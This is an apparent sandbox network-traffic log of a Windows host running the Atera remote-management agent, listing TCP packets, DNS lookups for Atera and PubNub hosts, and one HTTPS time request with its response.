                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.371393919 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.371414900 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.871529102 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.872868061 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.872914076 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.873023033 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.873421907 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.873434067 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:08.919341087 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.231437922 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.231571913 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.234443903 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.234457016 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.234770060 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.236299038 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.279333115 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.340682983 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.344743013 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.344778061 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.345027924 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.348634005 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.348647118 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.383336067 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.758620024 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.758711100 CET4435000913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.758776903 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759088039 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759217024 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759217024 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759236097 CET4435001413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759335041 CET50014443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.759516001 CET50009443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.760379076 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.760413885 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.760483980 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.761054039 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:10.761069059 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:11.177333117 CET4435001513.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:11.177405119 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:11.177427053 CET50015443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:12.664274931 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:12.665672064 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:12.665697098 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.185019970 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.289793968 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.289865017 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.291194916 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.291409969 CET4435002213.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.291476965 CET50022443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.292992115 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293032885 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293134928 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293843031 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.293854952 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.494764090 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.494843006 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.496898890 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.496912003 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.497184038 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.498367071 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:13.539334059 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.022638083 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.022720098 CET4435002313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.022766113 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.023473024 CET50023443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.024705887 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.024751902 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.024861097 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.025419950 CET50034443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:14.025439978 CET4435003413.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.730573893 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.730658054 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.732467890 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.732475996 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.732748032 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.733798027 CET50031443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:15.775368929 CET4435003113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300077915 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300678015 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300705910 CET4435006613.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.300780058 CET50066443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.978715897 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.978787899 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.979387045 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.979763985 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:26.979793072 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:27.477854013 CET4435006913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:27.477971077 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:27.477971077 CET50069443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:28.352984905 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:28.353095055 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.450290918 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.450387001 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673126936 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673146009 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673290968 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673321009 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673480988 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.673703909 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.675154924 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.675457954 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.715373993 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:29.719366074 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.195867062 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.195954084 CET4435007313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.196013927 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.196604013 CET50073443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.206985950 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207070112 CET4435007813.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207128048 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207619905 CET50078443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207879066 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207904100 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.207971096 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.208156109 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:30.208168030 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.535362005 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.542078018 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.542089939 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.708947897 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.708985090 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.713313103 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.717503071 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:32.717516899 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.056746960 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.056830883 CET4435008113.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.058880091 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:33.062743902 CET50081443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.037130117 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.040505886 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.040523052 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.554333925 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.554419041 CET4435008313.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.554505110 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.555835009 CET50083443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556402922 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556432009 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556518078 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556787014 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:35.556808949 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:37.950215101 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:37.952153921 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:37.952171087 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.475603104 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.475672007 CET4435008713.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.475713968 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.476286888 CET50087443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.477744102 CET50089443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.477842093 CET4435008913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.477921963 CET50089443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478416920 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478460073 CET4435009013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478538036 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478759050 CET50089443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478773117 CET4435008913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478960037 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:38.478976011 CET4435009013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.792424917 CET4435009013.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.836858988 CET50090443192.168.2.713.232.67.198
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.921768904 CET4435008913.232.67.198192.168.2.7
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:40.961877108 CET50089443192.168.2.713.232.67.198
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:07.898215055 CET5731853192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:17.856092930 CET5001353192.168.2.71.1.1.1
                                                                                                                                                                                                                                                                          Nov 24, 2024 11:17:20.404082060 CET5249553192.168.2.71.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 24, 2024 11:15:15.334073067 CET | 192.168.2.7 | 1.1.1.1 | 0xfeae | Standard query (0) | time.windows.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:25.999886990 CET | 192.168.2.7 | 1.1.1.1 | 0x1b95 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:37.968709946 CET | 192.168.2.7 | 1.1.1.1 | 0xb807 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:41.292779922 CET | 192.168.2.7 | 1.1.1.1 | 0x59b2 | Standard query (0) | ps.pndsn.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:41.325311899 CET | 192.168.2.7 | 1.1.1.1 | 0x9ac1 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:47.969455004 CET | 192.168.2.7 | 1.1.1.1 | 0xb8b8 | Standard query (0) | ps.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:52.852791071 CET | 192.168.2.7 | 1.1.1.1 | 0xa7d8 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:16:40.946964025 CET | 192.168.2.7 | 1.1.1.1 | 0x3881 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:16:48.962270975 CET | 192.168.2.7 | 1.1.1.1 | 0x4871 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:16:58.390908003 CET | 192.168.2.7 | 1.1.1.1 | 0x3c20 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:17:07.898215055 CET | 192.168.2.7 | 1.1.1.1 | 0x2068 | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:17:17.856092930 CET | 192.168.2.7 | 1.1.1.1 | 0xa1ce | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:17:20.404082060 CET | 192.168.2.7 | 1.1.1.1 | 0xc80b | Standard query (0) | agent-api.atera.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 24, 2024 11:15:15.471230030 CET | 1.1.1.1 | 192.168.2.7 | 0xfeae | No error (0) | time.windows.com | twc.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:17.050045013 CET | 1.1.1.1 | 192.168.2.7 | 0x32f3 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:17.050045013 CET | 1.1.1.1 | 192.168.2.7 | 0x32f3 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:26.137881994 CET | 1.1.1.1 | 192.168.2.7 | 0x1b95 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:33.294840097 CET | 1.1.1.1 | 192.168.2.7 | 0x5834 | No error (0) | windowsupdatebg.s.llnwi.net | | 178.79.238.0 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:33.294840097 CET | 1.1.1.1 | 192.168.2.7 | 0x5834 | No error (0) | windowsupdatebg.s.llnwi.net | | 178.79.238.128 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:34.910383940 CET | 1.1.1.1 | 192.168.2.7 | 0xca8c | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:34.910383940 CET | 1.1.1.1 | 192.168.2.7 | 0xca8c | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:36.508972883 CET | 1.1.1.1 | 192.168.2.7 | 0xda34 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:36.508972883 CET | 1.1.1.1 | 192.168.2.7 | 0xda34 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:36.556001902 CET | 1.1.1.1 | 192.168.2.7 | 0xf9e6 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:36.556001902 CET | 1.1.1.1 | 192.168.2.7 | 0xf9e6 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:38.106789112 CET | 1.1.1.1 | 192.168.2.7 | 0xb807 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:41.430591106 CET | 1.1.1.1 | 192.168.2.7 | 0x59b2 | No error (0) | ps.pndsn.com | | 13.232.67.198 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:41.430591106 CET | 1.1.1.1 | 192.168.2.7 | 0x59b2 | No error (0) | ps.pndsn.com | | 13.232.67.199 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:41.463342905 CET | 1.1.1.1 | 192.168.2.7 | 0x9ac1 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:48.497072935 CET | 1.1.1.1 | 192.168.2.7 | 0xb8b8 | No error (0) | ps.atera.com | d25btwd9wax8gu.cloudfront.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:48.497072935 CET | 1.1.1.1 | 192.168.2.7 | 0xb8b8 | No error (0) | d25btwd9wax8gu.cloudfront.net | | 108.158.75.93 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:48.497072935 CET | 1.1.1.1 | 192.168.2.7 | 0xb8b8 | No error (0) | d25btwd9wax8gu.cloudfront.net | | 108.158.75.12 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:48.497072935 CET | 1.1.1.1 | 192.168.2.7 | 0xb8b8 | No error (0) | d25btwd9wax8gu.cloudfront.net | | 108.158.75.4 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:48.497072935 CET | 1.1.1.1 | 192.168.2.7 | 0xb8b8 | No error (0) | d25btwd9wax8gu.cloudfront.net | | 108.158.75.46 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:52.606940985 CET | 1.1.1.1 | 192.168.2.7 | 0xc150 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:15:52.606940985 CET | 1.1.1.1 | 192.168.2.7 | 0xc150 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:15:52.991472006 CET | 1.1.1.1 | 192.168.2.7 | 0xa7d8 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:16:36.923233032 CET | 1.1.1.1 | 192.168.2.7 | 0x1db4 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:16:36.923233032 CET | 1.1.1.1 | 192.168.2.7 | 0x1db4 | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:16:41.086157084 CET | 1.1.1.1 | 192.168.2.7 | 0x3881 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:16:49.100241899 CET | 1.1.1.1 | 192.168.2.7 | 0x4871 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:16:58.529512882 CET | 1.1.1.1 | 192.168.2.7 | 0x3c20 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:17:08.203849077 CET | 1.1.1.1 | 192.168.2.7 | 0x2068 | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:17:17.995516062 CET | 1.1.1.1 | 192.168.2.7 | 0xa1ce | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
Nov 24, 2024 11:17:18.018788099 CET | 1.1.1.1 | 192.168.2.7 | 0xa138 | No error (0) | windowsupdatebg.s.llnwi.net | | 178.79.238.0 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:17:18.018788099 CET | 1.1.1.1 | 192.168.2.7 | 0xa138 | No error (0) | windowsupdatebg.s.llnwi.net | | 178.79.238.128 | A (IP address) | IN (0x0001) | false
Nov 24, 2024 11:17:20.541502953 CET | 1.1.1.1 | 192.168.2.7 | 0xc80b | No error (0) | agent-api.atera.com | agentsapi.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
                                                                                                                                                                                                                                                                          • ps.pndsn.com
                                                                                                                                                                                                                                                                          • ps.atera.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49768 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

Timestamp | Bytes transferred | Direction | Data
2024-11-24 10:15:43 UTC | 183 | OUT | GET /time/0?pnsdk=NET45CSharp6.13.0.0&requestid=b619f5c8-c13b-4e86-88e3-ba75e0e2aa5f&uuid=2094f497-2e94-42f0-b27c-add7e377a9d2 HTTP/1.1
Host: ps.pndsn.com
Connection: Keep-Alive
2024-11-24 10:15:44 UTC | 242 | IN | HTTP/1.1 200 OK
Date: Sun, 24 Nov 2024 10:15:44 GMT
Content-Type: text/javascript; charset="UTF-8"
Connection: close
Content-Length: 19
Cache-Control: no-cache
Access-Control-Allow-Credentials: true
Access-Control-Expose-Headers: *
2024-11-24 10:15:44 UTC | 19 | IN | Data Raw: 5b 31 37 33 32 34 34 33 33 34 34 31 30 31 30 34 39 36 5d
Data Ascii: [17324433441010496]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49771 | 13.232.67.198 | 443 | 6216 | C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe

Timestamp | Bytes transferred | Direction | Data
